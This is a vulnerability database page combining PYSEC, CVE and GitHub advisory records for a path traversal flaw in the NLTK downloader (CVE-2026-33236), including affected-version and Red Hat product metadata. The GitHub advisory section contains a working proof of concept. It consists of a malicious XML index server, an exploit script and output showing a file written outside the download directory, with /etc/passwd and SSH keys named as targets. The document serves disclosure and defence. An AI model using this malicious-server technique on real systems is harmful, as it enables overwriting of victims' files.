Action not permitted
Modal body text goes here.
Modal Title
Modal Body
PYSEC-2026-2237
Vulnerability from pysec - Published: 2026-03-20 23:16 - Updated: 2026-07-13 05:50NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as ../), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.
| Name | purl | nltk | pkg:pypi/nltk |
|---|
{
"affected": [
{
"ecosystem_specific": {},
"package": {
"ecosystem": "PyPI",
"name": "nltk",
"purl": "pkg:pypi/nltk"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.9.4"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.8",
"0.9",
"0.9.3",
"0.9.4",
"0.9.5",
"0.9.6",
"0.9.7",
"0.9.8",
"0.9.9",
"2.0.1",
"2.0.1rc1",
"2.0.1rc2-git",
"2.0.1rc3",
"2.0.1rc4",
"2.0.2",
"2.0.3",
"2.0.4",
"2.0.5",
"2.0b4",
"2.0b5",
"2.0b6",
"2.0b7",
"2.0b8",
"2.0b9",
"3.0.0",
"3.0.0b1",
"3.0.0b2",
"3.0.1",
"3.0.2",
"3.0.3",
"3.0.4",
"3.0.5",
"3.1",
"3.2",
"3.2.1",
"3.2.2",
"3.2.3",
"3.2.4",
"3.2.5",
"3.3",
"3.4",
"3.4.1",
"3.4.2",
"3.4.3",
"3.4.4",
"3.4.5",
"3.5",
"3.5b1",
"3.6",
"3.6.1",
"3.6.2",
"3.6.3",
"3.6.4",
"3.6.5",
"3.6.6",
"3.6.7",
"3.7",
"3.8",
"3.8.1",
"3.9",
"3.9.1",
"3.9.2",
"3.9.3",
"3.9b1"
]
}
],
"aliases": [
"CVE-2026-33236",
"GHSA-469j-vmhf-r6v7"
],
"details": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.",
"id": "PYSEC-2026-2237",
"modified": "2026-07-13T05:50:16.781467Z",
"published": "2026-03-20T23:16:47.007Z",
"references": [
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-33236"
},
{
"type": "WEB",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-33236.json"
},
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:10184"
},
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:19712"
},
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:37275"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449824"
},
{
"type": "FIX",
"url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"
},
{
"type": "EVIDENCE",
"url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
CVE-2026-33236 (GCVE-0-2026-33236)
Vulnerability from cvelistv5 – Published: 2026-03-20 22:47 – Updated: 2026-07-15 01:06- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
| URL | Tags |
|---|---|
| https://github.com/nltk/nltk/security/advisories/… | x_refsource_CONFIRM |
| https://github.com/nltk/nltk/commit/89fe2ec2c6bae… | x_refsource_MISC |
| https://access.redhat.com/security/cve/CVE-2026-33236 | vdb-entryx_refsource_REDHAT |
| https://bugzilla.redhat.com/show_bug.cgi?id=2449824 | issue-trackingx_refsource_REDHAT |
| https://security.access.redhat.com/data/csaf/v2/v… | x_sadp-csaf-vex |
| https://access.redhat.com/errata/RHSA-2026:10184 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:19712 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:37275 | vendor-advisoryx_refsource_REDHAT |
| Vendor | Product | Version | |
|---|---|---|---|
| nltk | nltk |
Affected:
<= 3.9.3
|
|
| Red Hat | Red Hat OpenShift AI 2.25 |
Unaffected:
1776243238 , < *
(rpm)
cpe:/a:redhat:openshift_ai:2.25::el9 |
|
| Red Hat | Red Hat OpenShift AI 2.25 |
Unaffected:
1776319185 , < *
(rpm)
cpe:/a:redhat:openshift_ai:2.25::el9 |
|
| Red Hat | Red Hat OpenShift AI 3.3 |
Unaffected:
1778262893 , < *
(rpm)
cpe:/a:redhat:openshift_ai:3.3::el9 |
|
| Red Hat | Red Hat OpenShift AI 3.3 |
Unaffected:
1778263054 , < *
(rpm)
cpe:/a:redhat:openshift_ai:3.3::el9 |
|
| Red Hat | Red Hat OpenShift AI 3.3 |
Unaffected:
1782471606 , < *
(rpm)
cpe:/a:redhat:openshift_ai:3.3::el9 |
|
| Red Hat | Lightspeed Core |
cpe:/a:redhat:lightspeed_core |
|
| Red Hat | OpenShift Lightspeed |
cpe:/a:redhat:openshift_lightspeed |
|
| Red Hat | Red Hat Ansible Automation Platform 2 |
cpe:/a:redhat:ansible_automation_platform:2 |
|
| Red Hat | Red Hat OpenShift AI (RHOAI) |
cpe:/a:redhat:openshift_ai |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33236",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-23T16:46:32.428625Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-23T16:46:42.554Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift_ai:2.25::el9"
],
"defaultStatus": "affected",
"packageName": "rhoai/odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9",
"product": "Red Hat OpenShift AI 2.25",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1776243238",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift_ai:2.25::el9"
],
"defaultStatus": "affected",
"packageName": "rhoai/odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9",
"product": "Red Hat OpenShift AI 2.25",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1776319185",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift_ai:3.3::el9"
],
"defaultStatus": "affected",
"packageName": "rhoai/odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9",
"product": "Red Hat OpenShift AI 3.3",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1778262893",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift_ai:3.3::el9"
],
"defaultStatus": "affected",
"packageName": "rhoai/odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9",
"product": "Red Hat OpenShift AI 3.3",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1778263054",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift_ai:3.3::el9"
],
"defaultStatus": "affected",
"packageName": "rhoai/odh-trustyai-nemo-guardrails-server-rhel9",
"product": "Red Hat OpenShift AI 3.3",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1782471606",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:lightspeed_core"
],
"defaultStatus": "affected",
"packageName": "lightspeed-core/lightspeed-stack-rhel9",
"product": "Lightspeed Core",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:lightspeed_core"
],
"defaultStatus": "affected",
"packageName": "lightspeed-core/rag-tool-rhel9",
"product": "Lightspeed Core",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"packageName": "openshift-lightspeed/lightspeed-ocp-rag-rhel9",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"packageName": "openshift-lightspeed/lightspeed-service-api-rhel9",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"packageName": "openshift-lightspeed-tech-preview/lightspeed-rag-tool-rhel9",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-24/de-minimal-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-24/de-minimal-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-24/de-supported-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-24/de-supported-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-24/ee-minimal-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-24/ee-minimal-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-24/ee-supported-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-24/ee-supported-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/aap-cloud-metrics-collector-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/ansible-dev-tools-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/de-minimal-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/de-minimal-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/de-supported-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/de-supported-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/ee-cloud-services-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/ee-minimal-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/ee-minimal-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/ee-supported-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-25/ee-supported-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "affected",
"packageName": "ansible-automation-platform-25/lightspeed-chatbot-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-26/ansible-dev-tools-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-26/de-minimal-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "affected",
"packageName": "ansible-automation-platform-26/de-supported-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-26/ee-minimal-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "affected",
"packageName": "ansible-automation-platform-26/ee-supported-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-26/lightspeed-chatbot-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform/ee-minimal-rhel8",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform/ee-minimal-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "ansible-automation-platform-tech-preview/ansible-devspaces-rhel9",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"packageName": "rhoai/odh-llama-stack-core-rhel9",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"packageName": "rhoai/odh-ta-lmes-job-rhel9",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
}
],
"datePublic": "2026-03-20T22:47:10.308Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in NLTK (Natural Language Toolkit), a suite of open-source Python modules for Natural Language Processing. The NLTK downloader does not validate `subdir` and `id` attributes when processing remote XML index files. A remote attacker can exploit this path traversal vulnerability by controlling a malicious XML index server, providing specially crafted values. This can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite on the system where NLTK is used."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-15T01:06:43.229Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-33236"
},
{
"name": "RHBZ#2449824",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449824"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-33236.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:10184"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:19712"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:37275"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:10184: Red Hat OpenShift AI 2.25"
},
{
"lang": "en",
"value": "RHSA-2026:19712: Red Hat OpenShift AI 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:37275: Red Hat OpenShift AI 3.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-20T23:01:51.656Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-03-20T22:47:10.308Z",
"value": "Made public."
}
],
"title": "nltk: NLTK: Arbitrary file overwrite and creation via path traversal in XML index files",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, ensure that any applications utilizing the NLTK downloader are configured to only interact with trusted XML index servers. Restrict network access for the application using NLTK to prevent connections to untrusted external resources. This operational control reduces the risk of an attacker controlling a malicious server to exploit the path traversal vulnerability. A service restart or reload may be required for network configuration changes to take effect."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "nltk",
"vendor": "nltk",
"versions": [
{
"status": "affected",
"version": "\u003c= 3.9.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-20T22:47:10.308Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"
},
{
"name": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"
}
],
"source": {
"advisory": "GHSA-469j-vmhf-r6v7",
"discovery": "UNKNOWN"
},
"title": "NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33236",
"datePublished": "2026-03-20T22:47:10.308Z",
"dateReserved": "2026-03-18T02:42:27.508Z",
"dateUpdated": "2026-07-15T01:06:43.229Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
GHSA-469J-VMHF-R6V7
Vulnerability from github – Published: 2026-03-19 12:42 – Updated: 2026-03-25 18:21Vulnerability Description
The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as ../), which can lead to:
- Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
- Arbitrary File Creation: Create arbitrary files
- Arbitrary File Overwrite: Overwrite critical system files (such as
/etc/passwd,~/.ssh/authorized_keys, etc.)
Vulnerability Principle
Key Code Locations
1. XML Parsing Without Validation (nltk/downloader.py:253)
self.filename = os.path.join(subdir, id + ext)
subdirandidare directly from XML attributes without any validation
2. Path Construction Without Checks (nltk/downloader.py:679)
filepath = os.path.join(download_dir, info.filename)
- Directly uses
filenamewhich may contain path traversal
3. Unrestricted Directory Creation (nltk/downloader.py:687)
os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
- Can create arbitrary directories outside the download directory
4. File Writing Without Protection (nltk/downloader.py:695)
with open(filepath, "wb") as outfile:
- Can write to arbitrary locations in the file system
Attack Chain
1. Attacker controls remote XML index server
↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
↓
3. Victim executes: downloader.download('passwd')
↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
↓
6. os.makedirs() creates directory: download_dir + "../../etc"
↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
↓
8. System file is overwritten!
Impact Scope
- System File Overwrite
Reproduction Steps
Environment Setup
- Install NLTK
pip install nltk
- Prepare malicious server and exploit script (see PoC section)
Reproduction Process
Step 1: Start malicious server
python3 malicious_server.py
Step 2: Run exploit script
python3 exploit_vulnerability.py
Step 3: Verify results
ls -la /tmp/test_file.zip
Proof of Concept
Malicious Server (malicious_server.py)
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler
# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")
# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
<packages>
<package id="test_file" subdir="../../../../../../../../../tmp"
url="http://127.0.0.1:8888/test.zip"
size="100" unzipped_size="100" unzip="0"/>
</packages>
</nltk_data>
"""
# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
f.write(malicious_xml)
with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
zf.writestr("test.txt", "Path traversal attack!")
# HTTP Handler
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/malicious_index.xml':
self.send_response(200)
self.send_header('Content-type', 'application/xml')
self.end_headers()
with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
self.wfile.write(f.read())
elif self.path == '/test.zip':
self.send_response(200)
self.send_header('Content-type', 'application/zip')
self.end_headers()
with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
self.wfile.write(f.read())
else:
self.send_response(404)
self.end_headers()
def log_message(self, format, *args):
pass
# Start server
if __name__ == "__main__":
port = 8888
server = HTTPServer(("0.0.0.0", port), Handler)
print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
print("Press Ctrl+C to stop")
try:
server.serve_forever()
except KeyboardInterrupt:
print("\nServer stopped")
Exploit Script (exploit_vulnerability.py)
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile
def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
print(f"Download directory: {download_dir}")
# Exploit vulnerability
from nltk.downloader import Downloader
downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
downloader.download("test_file", quiet=True)
# Check results
expected_path = "/tmp/test_file.zip"
if os.path.exists(expected_path):
print(f"\n✗ Exploit successful! File written to: {expected_path}")
print(f"✗ Path traversal attack successful!")
else:
print(f"\n? File not found, download may have failed")
if __name__ == "__main__":
exploit()
Execution Results
✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "nltk"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.9.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33236"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-19T12:42:42Z",
"nvd_published_at": "2026-03-20T23:16:47Z",
"severity": "HIGH"
},
